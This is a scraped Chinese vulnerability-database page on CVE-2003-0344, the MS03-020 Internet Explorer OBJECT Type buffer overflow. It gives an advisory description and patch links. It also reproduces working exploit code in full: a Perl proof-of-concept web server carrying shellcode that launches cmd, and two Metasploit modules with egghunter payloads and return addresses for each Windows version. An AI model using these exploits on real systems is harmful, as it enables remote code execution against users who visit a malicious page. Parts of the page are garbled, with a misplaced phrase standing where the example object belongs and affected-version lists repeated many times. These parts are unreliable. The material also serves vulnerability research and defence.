CVE-2003-0344
CVSS7.5
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:32:50
NMCOEPS    

[原文]Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page.


[CNNVD]Microsoft Internet Explorer对象类型属性缓冲区溢出漏洞(MS03-020)(CNNVD-200306-069)

        
        "Object"标记用于插入ActiveX组件等对象到HTML页面。"Object"标记的"Type"属性用于设置或获取对象的MIE类型。通常合法MIME类型包括"plain/text"或"application/hta", "audio/x-mpeg"等。
        "Object"标记的"Type"属性存在缓冲区溢出问题,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可能以用户权限在系统上执行任意指令。
        "Object"标记的"Type"属性虽然对参数进行了缓冲区边界检查,但是使用一特殊的字符可以绕过这个安全检查,构建类似如下的对象:
        Cooler Than Centra Spike
        使用了'/'字符,系统在对字符串进行缓冲区边界检查后会把'/'转换成'_/_'的三个字符,由于这个扩展,所以可导致溢出边界缓冲区。精心构建参数数据可以控制程序流程,可能以用户进程权限在系统上执行任意指令。
        攻击者可以构建恶意页面,或建立HTML形式的EMAIL,诱使用户打开触发此漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0
cpe:/a:microsoft:ie:5.01Microsoft Internet Explorer 5.01
cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:6.0::windows_server_2003

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:922IE Slash Characters in Type Property Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0344
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0344
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-069
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006401.html
(UNKNOWN)  FULLDISC  20030709 IE Object Type Overflow Exploit
http://marc.info/?l=bugtraq&m=105476381609135&w=2
(UNKNOWN)  BUGTRAQ  20030604 Internet Explorer Object Type Property Overflow
http://www.eeye.com/html/Research/Advisories/AD20030604.html
(VENDOR_ADVISORY)  EEYE  AD20030604
http://www.kb.cert.org/vuls/id/679556
(UNKNOWN)  CERT-VN  VU#679556
http://www.microsoft.com/technet/security/bulletin/ms03-020.asp
(VENDOR_ADVISORY)  MS  MS03-020

- 漏洞信息

Microsoft Internet Explorer对象类型属性缓冲区溢出漏洞(MS03-020)
高危 边界条件错误
2003-06-16 00:00:00 2005-10-20 00:00:00
远程  
        
        "Object"标记用于插入ActiveX组件等对象到HTML页面。"Object"标记的"Type"属性用于设置或获取对象的MIE类型。通常合法MIME类型包括"plain/text"或"application/hta", "audio/x-mpeg"等。
        "Object"标记的"Type"属性存在缓冲区溢出问题,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可能以用户权限在系统上执行任意指令。
        "Object"标记的"Type"属性虽然对参数进行了缓冲区边界检查,但是使用一特殊的字符可以绕过这个安全检查,构建类似如下的对象:
        Cooler Than Centra Spike
        使用了'/'字符,系统在对字符串进行缓冲区边界检查后会把'/'转换成'_/_'的三个字符,由于这个扩展,所以可导致溢出边界缓冲区。精心构建参数数据可以控制程序流程,可能以用户进程权限在系统上执行任意指令。
        攻击者可以构建恶意页面,或建立HTML形式的EMAIL,诱使用户打开触发此漏洞。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-020)以及相应补丁:
        MS03-020:Cumulative Patch for Internet Explorer (818529)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-020.asp

        补丁下载:
        * 除Windows Server 2003外所有IE6补丁:
        
        http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp

        * Microsoft Internet Explorer 6.0 for Windows Server 2003
        
        http://www.microsoft.com/windows/ie/downloads/critical/818529s/default.asp

- 漏洞信息 (37)

MS Internet Explorer Object Tag Exploit (MS03-020) (EDBID:37)
windows remote
2003-06-07 Verified
0 alumni
N/A [点击下载]
#!/usr/bin/perl

#
#  Proof of concept exploit on IE 5.x - 6.x by Alumni
#  IE-Object longtype dynamic call oferflow
#
#  url://<$shellcode><'/'x48><jmp %ptr_sh>
#  the flaw actually exists in URLMON.DLL when converting backslashes
#  to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#	
#  To exploit:  i)  start server perl script;
#	     ii) connect to http-service using IE/5.x.
#                   a) the shellcode size is limited up to 56 bytes;
#	     b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
#	     c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
#

use IO::Socket;

$port = 80;
$server = IO::Socket::INET->new (LocalPort => $port,
				Type =>SOCK_STREAM,
				Reuse => 1,
				Listen => $port) or die("Couldnt't create 
server socket\n");


$shellcode = 	"\x33\xdb".		# xor ebx, ebx
		"\x8b\xd4".		# mov edx, esp
		"\x80\xc6\xff".		# add dh, 0xFF
		"\xc7\x42\xfc\x63\x6d".	# mov dword ptr[edx-4], 0x01646D63 
("cmd\x01")
		"\x64\x01".		#
		"\x88\x5a\xff".		# mov byte ptr[edx-1], bl
		"\x8d\x42\xfc".		# lea eax, [edx-4]
		"\x8b\xf5".		# mov esi, ebp
		"\x56\x52".		# push esi; push edx
		"\x53\x53\x53\x53\x53\x53".	# push ebx
		"\x50\x53".		# push eax; push ebx
		"\xb8\x41\x77\xf7\xbf".	# mov eax, 0xBFF77741 ~= 
CreateProcessA
		"\xff\xd0".		# call eax
		"\xb8\xf8\xd4\xf8\xbf".	# mov eax, 0xBFF8D4F8 ~= 
ExitProcess
		"\xff\xd0".		# call eax
		"\xcc";			# int 3

$nop = "\x90";
$ret = "\\xAB\\x5D\\x58";


while ($client = $server->accept()) {
	while (<$client>) {
		if ($_ =~ /^(\x0D\x0A)/) {

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
&lt;script&gt;\r
	var mins = 56;\r
	var size = 48;\r
	var sploit = "$shellcode";\r
	var strNop = "$nop";\r
	var strObj = '&lt;object type="';\r
	for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
	strObj += sploit;\r
	for (i=0;i<size;i++) strObj += '/';\r
	strObj += "CCCCCCCCDDDDDDDD";\r
	strObj += "$ret";\r
	strObj += '">Hello&lt;/object&gt;';\r
	alert(strObj);\r
	document.write(strObj);\r
&lt;/script&gt;\r
END_DATA
			close($client);

		}
	}
}

close($server);

# milw0rm.com [2003-06-07]
		

- 漏洞信息 (16581)

MS03-020 Internet Explorer Object Type (EDBID:16581)
windows remote
2010-08-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms03_020_ie_objecttype.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name      => HttpClients::IE,
		:javascript   => false,
		:os_name      => OperatingSystems::WINDOWS,
		:vuln_test    => nil, # no way to test without just trying it
		:prefix_html  => "<!--[if lt IE 7]>",
		:postfix_html => "<![endif]-->",
		:rank         => NormalRanking  # reliable memory corruption
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-020 Internet Explorer Object Type',
			'Description'    => %q{
					This module exploits a vulnerability in Internet Explorer's
				handling of the OBJECT type attribute.
			},
			'Author'         => 'skape',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2003-0344' ],
					[ 'OSVDB', '2967'    ],
					[ 'BID', '7806'      ],
					[ 'MSB', 'MS03-020'  ],
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'MaxNops'  => 0,
					'BadChars' => "\x8b\xe2", # Prevent UTF-8-ification
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x777e85ab, # Windows NT: samlib jmp esp
									0x71ab1d54, # Windows XP: ws2_32 push esp/ret SP0/1
									0x77d1f92f, # Windows 2003: user32 jmp esp SP0/1
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 04 2003'))
	end

	def on_request_uri(cli, request)
		clean = 0x7ffdec50
		ret   = nil

		# Figure out which return address to use based on the user-agent
		case request['User-Agent']
			when /Windows NT 5.2/
				ret = target['Rets'][2]
			when /Windows NT 5.1/
				ret = target['Rets'][1]
			when /Windows NT/
				ret = target['Rets'][0]
			else
				print_status("Sending 404 to user agent: #{request['User-Agent']}")
				cli.send_response(create_response(404, 'File not found'))
				return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Pack the values
		ret    = [ ret   ].pack('V')
		clean  = [ clean ].pack('V')
		hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => true })
		egg    = hunter[1]

		# Now, build out the HTTP response payload
		content =
			"<html>" + egg + "\n" +
			"<object type=\"////////////////////////////////////////////////////////////////" +
			rand_text_alphanumeric(8) + ret + clean +
			make_nops(8) + hunter[0] + "\">" +
			"</object>" +
			"</html>"

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (22726)

Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability (EDBID:22726)
windows remote
2003-06-04 Verified
0 FelineMenace
N/A [点击下载]
source: http://www.securityfocus.com/bid/7806/info

Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. This could cause Internet Explorer to fail or potentially result in the execution arbitrary code in the security context of the current user.

http://www.exploit-db.com/sploits/22726.tar		

- 漏洞信息 (F83150)

MS03-020 Internet Explorer Object Type (PacketStormID:F83150)
2009-11-26 00:00:00
skape  metasploit.com
exploit
CVE-2003-0344
[点击下载]

This Metasploit module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name      => HttpClients::IE,
		:javascript   => false, 
		:os_name      => OperatingSystems::WINDOWS,
		:vuln_test    => nil, # no way to test without just trying it
		:prefix_html  => "<!--[if lt IE 7]>",
		:postfix_html => "<![endif]-->",
		:rank         => NormalRanking  # reliable memory corruption
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-020 Internet Explorer Object Type',
			'Description'    => %q{
				This module exploits a vulnerability in Internet Explorer's
				handling of the OBJECT type attribute.
			},
			'Author'         => 'skape',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2003-0344' ],
					[ 'OSVDB', '2967'    ],
					[ 'BID', '7806'      ],
					[ 'MSB', 'MS03-020'  ],
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'MaxNops'  => 0,
					'BadChars' => "\x8b\xe2", # Prevent UTF-8-ification
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x777e85ab, # Windows NT: samlib jmp esp
									0x71ab1d54, # Windows XP: ws2_32 push esp/ret SP0/1
									0x77d1f92f, # Windows 2003: user32 jmp esp SP0/1
								],
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		clean = 0x7ffdec50
		ret   = nil

		# Figure out which return address to use based on the user-agent
		case request['User-Agent']
			when /Windows NT 5.2/
				ret = target['Rets'][2]
			when /Windows NT 5.1/
				ret = target['Rets'][1]
			when /Windows NT/
				ret = target['Rets'][0]
			else
                print_status("Sending 404 to user agent: #{request['User-Agent']}")
                cli.send_response(create_response(404, 'File not found'))
                return
		end

		# Re-generate the payload 
		return if ((p = regenerate_payload(cli)) == nil)

		# Pack the values
		ret    = [ ret   ].pack('V')
		clean  = [ clean ].pack('V')
		hunter = generate_egghunter()
		egg    = hunter[1]

		# Now, build out the HTTP response payload
		content = 
			"<html>" + egg + egg + p.encoded + "\n" +
			"<object type=\"////////////////////////////////////////////////////////////////" +
			rand_text_alphanumeric(8) + ret + clean +
			make_nops(8) + hunter[0] + "\">" +
			"</object>" +
			"</html>"

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息

2967
Microsoft IE Object Type Property Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

Microsoft Internet Explorer contains a flaw in the way it handles certain "Object" tags. The flaw is triggered due to a buffer overflow in the "Type" property of the "Object" tag. While there are some sanity checks for buffer input, these can be circumvented using special characters. This attack may be utilized wherever IE parses HTML, so this vulnerability, affects newsgroups, mailing lists, or websites.

- 时间线

2003-06-04 Unknow
2003-06-04 2003-06-04

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Explorer OBJECT Tag Buffer Overflow Vulnerability
Boundary Condition Error 7806
Yes No
2003-06-04 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Drew Copley of eEye Digital Security, Discovery of language specific variant has been credited to Yuu Arai.

- 受影响的程序版本

Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
